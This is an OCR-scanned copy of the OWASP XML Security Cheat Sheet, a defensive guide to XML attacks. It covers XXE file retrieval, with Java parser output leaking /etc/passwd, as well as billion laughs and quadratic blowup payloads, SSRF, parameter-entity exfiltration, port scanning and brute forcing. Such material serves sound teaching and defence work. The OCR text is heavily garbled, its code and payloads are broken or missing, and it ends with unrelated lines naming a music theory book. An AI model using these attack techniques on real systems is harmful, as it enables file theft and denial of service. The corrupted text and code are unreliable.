72322, e100 AM XML Securty - OWASP Ceat Sheet Series
XML Security Cheat Sheet
Introduction
‘Specifications for XML and XML schemas include multiple security flaws. At the same time, these
specifications provide the tools required to protect XML applications. Even though we use XML.
schemas to define the security of XML documents, they can be used to perform a variety of
attacks: file retrieval, server side request forgery, port scanning, or brute forcing, This cheat sheet
exposes how to exploit the different possibilities in libraries and software divided in two sections:
‘+ Malformed XML Documents: vulnerabilities using not well formed documents.
+ Invalid XML Documents: vulnerabilities using documents that do not have the expected
structure.
Malformed XML Documents
‘The W3C XML specification defines a set of principles that XML documents must follow to be
considered well formed. When a document violates any of these principles, it must be considered a
fatal error and the data it contains is considered malformed. Multiple tactics will cause a
malformed document: removing an ending tag, rearranging the order of elements into a
nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop
execution once detecting a fatal error. The document should not undergo any additional
processing, and the application should display an error message.
‘The recommendation to avoid these vulnerabilities are to use an XML processor that follows W3C
specifications and does not take significant additional time to process malformed documents. In
addition, use only well-formed documents and validate the contents of each element and attribute
to process only valid values within predefined boundaries.
More Time Required
‘A malformed document may affect the consumption of Central Processing Unit (CPU) resources.
In certain scenarios, the amount of time required to process malformed documents may be greater
than that required for well-formed documents. When this happens, an attacker may exploit an
asymmetric resource consumption attack to take advantage of the greater processing time to
cause a Denial of Service (D0).
Intps:ifcheatshectseris.owasp.orgicheatsheetsXML._Securty_Cheat_Sheet.himl 1272322, e100 AM XML Securty - OWASP Ceat Sheet Series
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the
time taken by a malformed version of that same document. Then, consider how an attacker could
Use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify
the effect.
Applications Processing Malformed Data
Certain XML parsers have the ability to recover malformed documents. They can be instructed to
ty their best to return a valid tree with all the content that they can manage to parse, regardless of
the document's noncompliance with the specifications. Since there ate no predefined rules for the
recovery process, the approach and results may not always be the same. Using malformed
documents might lead to unexpected issues related to data integrity
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:
Malformed Document to Malformed Document.
According to the XML specification, the string -- (double-typhen) must net occur within
‘comments. Using the recavery made of kml and PHR, the following document will remain the
same after being recovered:
Well-Formed Document to Well-Formed Document Normalized
Certain parsers may consider normalizing the contents of your coATA sections, This means that
they will update the special characters contained in the COATA section to contain the safe versions
of these characters even though isnot required
a=1 ;|]>
Nomalization of a coaTA section isnot @ common rule among parsers. Libxml could transform
this documento its canonical version, but although well formed, its contents mey be considered
malformed depending on the situation:
Alt;scriptagt;ae1;8lt;/scriptéat;
Intps:ifcheatshectseris.owasp.orgicheatsheetsXML._Securty_Cheat_Sheet.himl72322, e100 AM XML Securty - OWASP Ceat Sheet Series
Coercive Parsing
A coercive attack in XML involves parsing deeply nested XML documents without their
corresponding ending tags. The idea is to make the victim use up -and eventually deplete- the
machine's resources and cause a denial of service on the target. Reports of a DoS attack in Firefox
3.67 included the use of 30,000 open XML elements without their corresponding ending tags.
Removing the closing tags simplified the attack since it requires only half of the size of a well
formed document to accomplish the same results. The number of tags being processed eventually
caused a stack overfiow. A simplified version of such a document would look like this:
Violation of XML Specification Rules
Unexpected consequences may result from manipulating documents using parsers that do not
follow W3C specifications. It may be possible to achieve crashes and/or code execution when the
software does not properly verify how to handle incorrect XML structures. Feeding the software
with fuzzed XML documents may expose this behavior.
Invalid XML Documents
‘Attackers may introduce unexpected values in documents to take advantage of an application that
does not verify whether the document contains a valid set of values. Schemas specify restrictions
that help identify whether documents are valid. A valid document is well formed and complies with
the restrictions of a schema, and more than one schema can be used to validate a document.
‘These restrictions may appear in multiple files, either using a single schema language or relying on
the strengths of the different schema languages.
‘The recommendation to avoid these vulnerabilities is that each XML document must have a
precisely defined XML Schema (not DTD) with every piece of information properly restricted to
avoid problems of improper data validation. Use a local copy or a known good repository instead of
the schema reference supplied in the XML document. Also, perform an integrity check of the XML
schema file being referenced, beating in mind the possibilty that the repository could be
compromised. In cases where the XML documents are using remcte schemas, configure servers to
Intps:ifcheatshectseris.owasp.orgicheatsheetsXML._Securty_Cheat_Sheet.himl72322, e100 AM XML Securty - OWASP Ceat Sheet Series
use only secure, encrypted communications to prevent attackers from eavesdropping on network
traffic.
Document without Schema
Consider a bookseller thet uses a web service through a web interface to make transactions. The
XML document for transactions is composed of two elements: an id value related to an item and
acertain price . Theuser may only introduce a certain id value using the web interface:
12318
If thereis no control on the dcoument's structure, the application could also process different wel-
formed messages with unintended consequences. The previous document could have contained
additional tags to affect the behavior of the underlying application processing its contents:
123 id>1@
Notice again how the vale 123 is supplied as an id , but new the document includes additional
opening and closing tags. The attacker closed the id element and sets. bogus price element to
the value 0. The final step to keep the structure welhformed is to add one empty id element After
this, the application adds the closing tag for i¢ and set the price 1010. fthe application
processes only the first values provided for the ID and the value without performing any type of
control on the structure. it could benefit the attacker by providing the ability to buy @ book without
actually paying for it.
Unrestrictive Schema
Certain schemas do nct offer enough restrictions for the type of data that each element can
receive. This is what normally happens when using DTD; it has a very lim ted set of possibilities
compared to the type of restrictions that can be applied in XML documents. This could expose the
application to undesired values within elements or attributes that would be easy to constrain when
using other scheme languages. In the following example, person's aoe is Validated against an
infne DTD schema:
Intps:ifcheatshectseris.owasp.orgicheatsheetsXML._Securty_Cheat_Sheet.himl72322, e100 AM XML Securty - OWASP Ceat Sheet Series
i.
John Doe11111, .(7.088.008digits). .11111
‘The previous document contains an inline DTD with a toot element named person . Thiselement
contains two elements ina specific order: name and then age. The element nane is then defined
to contain PCDATA aswell asthe element age . After this definition begins the wellformed and
valid XML document. The element name contains an irrelevant value but the age element contains
one milion digits. Since there are no restrictions on the maximum size forthe age element, this
‘one-million-digit string could be sent to the server for this element. Typically this type of element
should be restricted to contain no mate than a certain amount cf characters and constrainedto a
certain set cf characters (for example, digits from 0 to 9, the + sign and the sign). If nat properly
restricted, applications may handle potentially invalid values containedin documents. Since itis
not possible to indicate specific restrictions (a maximum length for the element nane ora Valid
range for the element age), this type of schema increases the risk of affecting the integrity and
availabilty of resources.
Improper Data Validation
When schemas are insecurely defined and do not provide strict rules, they may expose the
application to diverse situations. The result of this could be the disclosure of internal errors or
documents that hit the application's functionality with unexpected values.
String Data Types
Provided you need to use a hexadecimal value, there is no point in defining this value as a string
that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario,
when using XML encryption some values must be encoded using base64.. This is the scherna
definition of how these values should look
The previous schema defines the element CipherValue asa base64 deta type. Asan exemple, the
IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after
Intps:ifcheatshectseris.owasp.orgicheatsheetsXML._Securty_Cheat_Sheet.himl72322, e100 AM XML Securty - OWASP Ceat Sheet Series
a valid base64 value, and will consider it valid. The first portion of this datais properly checked as a
base64 value, but the remaining characters could be anything else (including other sub-elements of
the Cipherbata element). Restrictions are partially set for the element, which means that the
information is probably tested using an application instead of the proposed sample schema.
Numeric Data Types
Defining the correct data type for numbers can be more complex since there are more options than
there are for strings.
[NEGATIVE AND POSITIVE RESTRICTIONS
XML Schema numeric data types can include different ranges of numbers. They could include:
+ negativelnteger: Only negative numbers
+ nonNegativelnteger: Positive numbers and the zero value
+ positiveinteger: Only positive numbers
‘+ nonPositiveinteger: Negative numbers and the zero value
The following sample document defines an id fora product, a price, anda quantity value thet
is underthe contol of an attacker:
t181
‘To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect
structure in cases where an attacker Wants to introduce additional elements:
id" type="xs:integer" />
price” type="xs:decimal" />
quantity” type="xs: integer" />
Limitingthat quantity toaninteger data type will avoid any unexpected characters. Once the
application receives the previous message, it may calaulate the final price by doing
Intps:ifcheatshectseris.owasp.orgicheatsheetsXML._Securty_Cheat_Sheet.himl72322, e100 AM XML Securty - OWASP Ceat Sheet Series
price*quantity . However, since this data type may allow negative values, it might allow a
negative result on the user's account if an attacker provides anegativenumber. What you probably
want to see in here to avoid that logical vulnerability is postivelnteger instead of integer.
DIVIDE BY ZERO
\Whenever using user controlled values as denominators in a division, developers should avoid
allowing the number zero. In cases whete the value Zero is used for division in XSLT, the error
OAR@061 will oocur. Cther applications may throw other exceptions and the program may crash.
There are specific data types for XML schemas that specifically avoid using the zero value. For
example in cases where negative values and zero are not considered valid, the scheme could
specify the data type positivernteger for theelement.
The element denominator is now restricted to positive integers. This means that only vahes
‘greater than zero will be considered valid. If you see any cther type of restriction being used, you
may trigger an error if the denominator is Zero.
SPECIAL VALUES: INFINITY AND NCT A NUMBER (NAN)
‘The datatypes float and double contain real numbers and some special values: -InFinity or
=INF, NaN, and +TnFinity or INF. These possibilities may be useful to express certain values,
but they are sometimes misused, The problem is that they are commonly used to express only real
numbers such as prices. This is 2 common error seen in cther programming languages, not solely
restricted to these technologies. Net considering the whole spectrum of possible values for a deta
type could make underlying applications fail If the special values Infinity and NaN arenot
required and only real numbers are expected, the data type decinel istecommended:
-
yt tp: //ww.w3 .org/2081 /XMLSchema">
uy"
id” type="xerinteger" />
price” ty| :decinal" />
quantity” type="xs:positivelnteger" />
Intps:ifcheatshectseris.owasp.orgicheatsheetsXML._Securty_Cheat_Sheet.himl m2XML Securty - OWASP Ceat Sheet Series
The price value will not trigger any errors when set at Infinity or NaN, because these values will not
be valid. An attacker can exploit this issue if those values are allowed.
General Data Restrictions
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes
only a certain subset of values within a data type will be considered vali
PREFIXED VALUES
Certain types of values should only be restricted to specific sets: traffic lights will have only three
types of colors, only 12 months are available, and so on. It is possible that the schema has these
restrictions in place for each element or attribute. This is the most perfect allow-list scenario for an
application: only specific values will be accepted. Such a constraint is called enumeration in XML
schema. The following example restricts the contents of the element month to 12 possible values
-
xs enumeration February"/>
-
xs enumeration April" />
xs :enuneration May"/>
xs !enuneration June" />
xs :enuneration July" />
xs enumeration August" />
xs enumeration September" />
xs enumeration October" />
xs enumeration Novenber" />
xs enumeration Decenber"/>
By limiting the month element's value to any of the previous values, the application will not be
‘manipulating random strings.
RANGES
Software applications, databases, and programming languages normally store information within
specific ranges. Whenever using an element or an attribute in locations where certain specific
sizes matter (to avoid overflows or underflows), it would be logical to check whether the data
length is considered valid, The following schema could constrain a name using a minimum and a
‘maximum length to avoid unusual scenarios:
Intps:ifcheatshectseris.owasp.orgicheatsheetsXML._Securty_Cheat_Sheet.himl72322, e100 AM XML Securty - OWASP Ceat Sheet Series
In cases where the possible values are restricted toa certain specific lencth (let say 8), this value
can be specified as follows 10 be valid:
PATTERNS.
Certain elements or attributes may follow a specific syntax. You can add pattern restrictions
‘when using XML schemas. When you want to ensure that the data complies with a specific pattem,
you can create a specific defnition for it Social security numbers (SSN) may serve as @ good
example; they must use a specific set of characters, a specific lencth, anda specific pattern:
Onlynumbers between a60-00-600 and 99-99-9999 will be allowed as values for SSN.
ASSERTIONS
Assertion components constrain the existence and values of related elements and attributes on
XML schemas. An element of attribute will be considered valid with regard to an assertion only if
the test evaluates to true without raising any error. The variable $value canbe used to reference
the contents of the value being analyzed. The Divide by Zero section above referenced the potential
consequences of using data types containing the zero value for denominators, proposinga data
‘ype containing only positive values. An opposite example would consider valid the entire range of
Intps:ifcheatshectseris.owasp.orgicheatsheetsXML._Securty_Cheat_Sheet.himl72322, e100 AM XML Securty - OWASP Ceat Sheet Series
numbers excert 2et0. To avcid disclosing potential errs, values couldbe checked using an
assertion disallowing the number zero:
‘The assertion guarantees that the denominator will not contain the value zero as a valid number
and also allows negative numbers to be a valid denominator.
OCCURRENCES
‘The consequences of not defininga maximum number of occurrences could be worse than coping
vith the consequences of what may happen when receiving extreme numbers of items to be
processed. Two attributes specify minimum and maximum fimits: mindecurs and wax0ceurs
‘The default value for beth the mindccurs and the naxdccurs attributes is 1 , but certain elements
may require other values. For instance, if a value is optional, it could contain a mindecurs of 0, and
if there is no mit on the maximum amount, it could contain a waxdccurs of unbounded, as inthe
following example
buy” maxOccurs="unbounded">
‘type="xs:integer"/>
sdecimal" />
integer" />
The previous schema includes aroct elementnamed operation , which can contain an untimited
(unbounded ) amount cf buy elements. This is a common finding, since developers do nat normally
Want to restrict maximum numbers of occurrences. Applications using limitless occurrences
should test what happens when they receive an extremely large amount of elements to be
Intps:ifcheatshectseris.owasp.orgicheatsheetsXML._Securty_Cheat_Sheet.himl soreXML Securty - OWASP Ceat Sheet Series
processed. Since computational resources are limited, the consequences should be analyzed and
eventually a maximum number ought to be used instead of an unbounded value
Jumbo Payloads
‘Sending an XML document of 1GB requires only a second of server processing and might not be
worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU
and traffic used to generate this type of attack, compared to the overall amount of server CPU or
traffic used to handle the requests.
Traditional Jumbo Payloads
There are two primary methods to make a document larger than normal
‘+ Depth attack: using a huge number of elements, element names, and/or element values.
‘+ Width attack: using a huge number of attributes, attribute names, and/or attribute values.
In most cases, the overall result will be a huge document. This is a short example of what this
looks lke:
"Small" Jumbo Payloads
The following example is a very small document, but the results of processing this could be similar
to those of processing traditional jumbo payloads. The purpose of such a small payload is that it
allows an attacker to send many documents fast enough to make the application consume most or
all of the available resources:
<2xml_version="1.0°7>
I>
Schema Poisoning
Intps:ifcheatshectseris.owasp.orgicheatsheetsXML._Securty_Cheat_Sheet.himl sineXML Securty - OWASP Ceat Sheet Series
When an attacker is capable of introducing modifications toa schema, there could be muttiple
high-tisk consequences. In particular, the effect of these consequences will be mote dangerous if
the schemas are using DTD (e.g. file retrieval, denial of service). An attacker could exploit this type
‘of vulnerability in numerous scenarios, always depending on the location of the schema.
Local Schema Poisoning
Local schema poisoning happens when schemas are available in the same host, whether or not the
‘schemas are embedded in the same XML document
[EMBEDDED SCHEMA
‘The most trivial type of schema poisoning takes place when the schema is defined within the same
XML document. Consider the following, unknowingly vulnerable example provided by the W3C
<2xml_version="1.0"2>
is
enote>
Tovec/to>
cheading>Reminder
Don't forget me this weekend
All restrictions on the note element could be removed or altered, allowing the sending of any type
of data to the server. Furthermore, if the server is processing external entities, the attacker could
use the schema, for example, to read remote files from the server. This type of schema only serves
as a suggestion for sending a document, but it must contain a way to check the embedded schema
integrity to be used safely. Attacks through embedded schemas are commonly used to exploit
external entity expansions. Embedded XML schemas can also assist in port scans of intemal hosts
or brute force attacks.
INCORRECT PERMISSIONS
You can often circumvent the risk of using remotely tampered versions by processing a local
schema,
Tove
Intps:ifcheatshectseris.owasp.orgicheatsheetsXML._Securty_Cheat_Sheet.himl rene72322, e100 AM XML Securty - OWASP Ceat Sheet Series
Reminder
However, ifthe local schema doesnot contain the cartect permissions, an intemal attacker could
alter the original restrictions. The following line exemplifies a schema using permissions that allow
any user to make modifications:
crw-rwerw= 7 user staff 743 Jan 18 12:32 note.ded
The permissions set on nane dtd allow any user on the system to make modifications. This
vulnerability is clearly not related to the structure of an XML ora schema, but since these
documents are commonly stored in the filesystem, itis worth mentioning that an attacker could
exploit this type of problem.
Remote Schema Poisoning
‘Schemas defined by external organizations are normally referenced remotely. If capable of
diverting or accessing the networks traffic, an attacker could cause a victim to fetch a distinct type
of content rather than the one originally intended.
(MAN-IN-THE-MIDDLE (MITM) ATTACK.
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol
(HTTP), the communication is performed in plain text and an attacker could easily tamper with
traffic. When XML documents reference remote schemas using an HTTP connection, the
connection could be sniffed and modified before reaching the end user:
-Toves/to>
Jani
Reminder
Don't forget me this weekend
The remote file note.dtd could be susceptible to tampering when transmitted using the
unencrypted HTTP protocol. One tool available to facilitate this type of attack is mimproxy .
DNS-CACHE POISONING
Remote schema poisoning may also be possible even when using encrypted prctocols like
Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name
‘system (DNS) resolution on an IP address to obtain the hostname. it mey not properly ensure that
Intps:ifcheatshectseris.owasp.orgicheatsheetsXML._Securty_Cheat_Sheet.himl sane72322, e100 AM XML Securty - OWASP Ceat Sheet Series
the IP address is truly associated with the hostname. In this case, the software enables an attacker
to redirect content to their own Intemet Protocol (P) addresses.
‘The previous example referenced the hast exanple.con using an uneneryptedpratocal.
\When switching to HTTPS, the location of the remote schema will ook like
https: //example/note. dtd . Ina normal scenario, the IP of exanple.con resolves to 1.1.1.1:
§ host exanple.com
example.com has address 1.1.1.1
If anattacker compromises the DNSbeing used, the previous hostname could now point to anew,
different IP controlled by the attacker 2.2.2.2
§ host example.com
example.com has address 2.2.2.2
\When accessing the remote file the victim may be actually retrieving the contents of a location
controlled by an attacker.
EVIL EMPLOYEE ATTACK
\When third parties host and define schemias the contents are not under the control of the
schemas’ users. Any modifications introduced by a malicious employee-or an extemal attacker in
control of these files-could impact all users processing the schemas. Subsequently attackers
could affect the confidentiality inteaity, or availabilty of other services (especially if the schema in
use is DTD).
XML Entity Expansion
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser
during document processing, These adverse effects could include the parser crashing or
accessing local files.
‘Sample Vulnerable Java Implementations
Using the DTD capabilities of referencing local or remote filsit is possible to affect the
confidentiality n addition, it is also possible to affect the availability of the resources if no proper
restrictions have been set for the entities expansion. Consider the following example code of an
XXE.
‘Sample XML:
Intps:ifcheatshectseris.owasp.orgicheatsheetsXML._Securty_Cheat_Sheet.himl sane9123/22, 9:00 AM XML Securty - OWASP Ceat Sheet Series
John&xxe;
‘Sample DTD:
XMEUSING DOM
import java.io. T0Exception;
import javax.xml.parsers.DocumentBuilder ;
import javax.xml.parsers.DocunentBuilderFactory;
import javax.xml.parsers.ParserConfiguration€xception;
import org.xml.sax.InputSource;
import org.w3c.dom.Document ;
import org.w3c.dom.Elenent ;
import org.w3c.dom.Node;
import org.w3c.dom.NodeList ;
public class parseDocument {
public static void main(Stringl] args) {
try {
DocunentBuilderFactory factory = DocumentBuilderFactory.newInstance() ;
DocunentBuilder builder = factory nenDocumentBuil der (
Document doc = builder .parse(new InputSource("contacts.xml"));
NodeList nodeList = doc.getElenentsByTagNane ("contact") ;
for (int s = 8; s < nodeList.getLength(); s+) {
Node firstNode = nodeList-item(s) ;
if (FirstNode .getNodeType() == Node -ELEMENTNODE) {
Elenent firstElenent = (Elenent) firstNode;
Nodelist firstNameFlenentList =
firstElenent .getElenentsByTagNane("firstnane");
Element firstNameElenent = (Elenent) firstNameElenentList.item(@) ;
Nodelist firstNane = firstNane€lement .getChildiodes() ;
System.out-printIn("First Nene: “ + ((Node)
firstNane.item(a)) .getNodeValue());
Nodelist lastName€ lenentlist
firstElenent .getElenentsByTagName("lestnane");
Element lostNoneflement = (Element) lastNomeflementList.item(@) ;
NodeList lastName = lastNereElenent .getChildNodes() ;
System.out.printIn(“Last None: " + ((Node)
LastName. item(@) ).getNodeVaLve());
Intps:ifcheatshectseris.owasp.orgicheatsheetsXML._Securty_Cheat_Sheet.himl ssr29123/22, 9:00 AM XML Securty - OWASP Ceat Sheet Series
+
+
} catch (Exception e) {
e.printStackTrace() ;
}
}
}
‘The previous code produces the following output:
$ javac parseDocument..java ; java parseDocument
First Nane: John
Last Nane: ### User Database
nobody :*:~2:-2:Unprivileged User :/var/empty :/usr/bin/false
root :*:0:8:System Administrator :/var/root: /bin/sh
ME USING DOMA
import org.dom4j Document ;
import org.dom4 j.DocumentExcept:ion;
import org.don4}.i0.SAXReader ;
import org.don4}.io.OutputFormat;
import org.dom4}.i0. XMLWriter;
public class test? {
public static void main(Stringl] args) {
Document document = null;
try 4
SAXReader reader = new SA‘Reader() ;
document. = reader .read("contacts..xn1");
) catch (Exception e) {
e.printStackTrace();
)
OutputFormat format = OutputFormat.createPrettyPrint() ;
try {
XiLWriter writer = new XMLWriter( System.out, format );
writer .write( document );
} catch (Exception e) {
e.printStackTrace();
}
The previous code produces the following output:
$ java test
<2xml_version="1.8" encoding="UTF-8"2>
Intps:ifcheatshectseris.owasp.orgicheatsheetsXML._Securty_Cheat_Sheet.himl
s6r29123/22, 9:00 AM XML Securty - OWASP Ceat Sheet Series
John#s# User Database
nobody :*:-2:-2:Unprivileged User :/var/enpty :/usr/bin/false
root :*:0:8:System Administrator :/var/root: /bin/sh
XME USING SAX
import java.io. 10Exception;
import javax.xml.parsers.SAXParser;
import jevax.xml.parsers. SAXParserFactory;
import org.xml.sax.SAXException;
import org.xml.sax.helpers.DefaultHandler ;
public class parseDocunent extends DefavitHandler {
public static void main(Stringl] args) {
‘new parseDocunent() ;
)
public persebocument() {
try {
SAXParserFactory factory = SAXParserFactory newinstance() ;
SAXParser parser = factory.newSAXParser() ;
parser.parse("contacts.xnl", this);
} catch (Exception e) {
e.printStackTrace( );
)
)
override
public void characters(char[] ac, int 4, int }) throws SAXException {
String tmpValue = new String(ac, i, 3);
Systen. out printin( tmp¥alue) ;
)
}
‘The previous code produces the following output:
$ java parseDocument
Join
d#ii# User Database
nobody:*:-2:-2:Unprivileged User :/var/enpty::/usr/bin/false
root:*:0:8:System Administrator :/var/root:/bin/sh
XMEUSINGSTAX
import javax.xml.parsers.SAXParserFactory;
import javax.xml.stream.XMLStreanReader ;
import javax.xml.stream.xMLInputFactory;
Intps:ifcheatshectseris.owasp.orgicheatsheetsXML._Securty_Cheat_Sheet.himl seeXML Securty - OWASP Ceat Sheet Series
import java.io.File;
import java.io.FileReader;
import java.io.FileInputStrean;
public class parseDocunent {
public static void main(String[] args) {
try {
XLInputFactory xnlif = XMLInputFactory newInstance();
FileReader fr = new FileReader(*contacts.xnl") ;
File file = new File("contacts.xnl");
wLstreamReader xnlfer = xnlif.createXM.StreanReader("contacts.xnl",
new FileInputStrean(file)) ;
int_eventType = xnlfer .getEventType() ;
while (xmfer.hasNext()) {
eventType = xmlfer.next();
if (xml fer .hasText ()){
Systen.out.print (xmlfer.getText());
}
d
fr.close();
} catch (Exception e) {
e.printStackTrace();
}
}
}
‘The previous code produces the following output:
$ java parseDocument
8B;">
BAs
Quadratic Blowup
Intps:ifcheatshectseris.owasp.orgicheatsheetsXML._Securty_Cheat_Sheet.himl sere72322, e100 AM XML Securty - OWASP Ceat Sheet Series
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one
very large entity and refers to it as many times as possible, resulting in a quadratic expan:
(0(n'2)).
The result of the following attack will be 100,000 x 100,000 characters in memory.
I>
BA;8A;8A;8A;...(2 108.080 &A;'s)...8A;A;8A;8A;8A;
Billion Laughs
When an XML parser tries to resolve the external entities included within the following code, it will
cause the application to start consuming all of the available memory until the process crashes.
This is an example XML document with an embedded DTD scheme including the attack:
ENTITY LOL "LOL">
ENTITY LOL1 "LOL ;8LOL ;8LOL;LOL ;@LOL ;8LOL ;&LOL ;8LOL ;LOL ;8LOL;">
S!ENTITY LOL2 "8LOL1 ;LOL1 ;€LOL1 ;8LOL1 ;€LOL1 ;LOL1 ;8LOL1 ;8LOL1 ;&LOL1 ;8LOL1 ;
S!ENTITY LOLS "&LOL2;ALOL2;8LOL2;8LOL2;LOL2 ;8LOL2; 8LOLZ ;&LOLZ;&LOL2 ;8LOL2;*
&l019;
‘The entity LoL9 willbberesolved as the 10entities defined in LoL ; then each of these enti
be resolved in Lo.7 and soon. Finaly, the CPU and/ormemory willbe affected by parsing the 3 x
16*9 (3,000,000,000) entities definedin this schema, which could make the parser crash.
‘The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that
€@ SOAP processor can reject any SOAP message that contains a DTD. Despite this specification,
certain SCAP implementations did parse D1D schemas within SOAP messages.
The following exempleillustrates a case where the parser isnot following the specification,
enabling a reference to a DTD ina SCAP message:
<2XML_VERSION="1.” ENCODING="UTF-8"2>
‘BLOL;8LOL ;8LOL ;8LOL ;LOL ;8LOL ;8LOL ;BLOL ;BLOL ;8LOL; ">
LOL1 ;8LOL1 ;LOL1 ;8LOL1 ;">
-FOO
Reflected File Retrieval
Consider the following example code of an XXE:
<2xml_version="1." encoding="ZS0-8859-1"7>
is
Bxxe ;
The previous XML defines an entitynamed xxe , whichis in fact the contentsof /etc/passnd,
which will be expanded within the includene tag. Ifthe parser allows references to external
entities, it might include the contents of that file in the XML response or in the error output.
‘Server Side Request Forgery
‘Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema,
which makes the server retrieve remote resources such as a file, afile via HTTP/HTTPS/FTP, etc.
'SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or
perform port scanning, or perform brute force attacks on internal networks.
[EXTERNAL DNS RESOLUTION
‘Sometimes is possible to induce the application to perform server-side DNS lookups of arbitrary
domain names. This is one of the simplest forms of SSRF, but requires the attacker to analyze the
DNS traffic. Burp has a plugin that checks for this attack
Intps:ifcheatshectseris.owasp.orgicheatsheetsXML._Securty_Cheat_Sheet.himl 2012272322, e100 AM XML Securty - OWASP Ceat Sheet Series
[EXTERNAL CONNECTION
Whenever thereis an XXE and you cannot retrieve a file, you can test if you would be able to
establish remote connections:
suxxe
I
LE RETREVAL WITHPARAMETER ENTITIES.
Parameter entities allows for the retrieval of content usingURL references. Consider the follawing
malicious XML document:
<2xml_version="1.0" encoding="utf-8"?>
dtd;
I
&send;
Here the DTD defines two extemal parameter entities: fi1¢ loads a local file, and dtd which
loads a remote DTD. The remote DTD should contain something like this:
<2xml_version="1." encoding="UTF-8"?>
">
wall;
The second DTD causes the system to send the contents of the file back to the attacker's server
as a parameter of the URL.
PORT SCANNING
“The amount and type of information will depend on the type of implementation. Responses can be
Classified as follows, ranking from easy to complex:
1) Complete Disclosure: The simplest and most unusual scenario, with complete disclosure you
can dearly see what's going on by receiving the complete responses from the server being queried.
‘You have an exact representation of what happened when connecting to the remete host.
Intps:ifcheatshectseris.owasp.orgicheatsheetsXML._Securty_Cheat_Sheet.himl 21reaXML Securty - OWASP Ceat Sheet Series
2) Error-based: If you are unable to see the response from the remote server, you may be able to
use the error response. Consider a web service leaking details on what went wrong in the SOAP.
Fault element when trying to establish a connection:
java.io.10Exception: Server returned HTTP response code: 401 for URL:
hetp://192.168.1.7:80
at
sun.net.wiw.protocol.http.HttpURLConnect ion .getInputStream(HttpURLConnection. java:1
at
com. sun.org. apache. xerces. internal. imp]. XMLEntityMenager.. setupCurrentEntity(XMLEnti
3) Timeout-based: Timeouts could occur when connecting to open or closed ports depending on
the schema and the underlying implementation. If the timeouts occur while you are trying to
‘connect to a closed port (which may take one minute), the time of response when connected to a
valid port will be very quick (one second, for example). The differences between open and closed
ports becomes quite clear.
4) Time-based: Sometimes differences between closed and open ports are very subtle. The only
way to know the status of a port with certainty would be to take multiple measurements of the time
required to reach each host; then analyze the average time for each port to determinate the status
of each port. This type of attack will be difficult to accomplish when performed in higher latency
networks.
BRUTE FORCING
Once an attacker confirms that it is possible to perform a port scan, performing a brute force
attack is a matter of embedding the usernane and pessword as part of the URI scheme (http ftp,
etc). For example the following:
-
Music Theory - From Beginner To Expert - The Ultimate Step-By-Step Guide To Understanding and Learning Music Theory Effortlessly (Essential Learning Tools For Musicians Book 1)
Music Theory - From Beginner To Expert - The Ultimate Step-By-Step Guide To Understanding and Learning Music Theory Effortlessly (Essential Learning Tools For Musicians Book 1)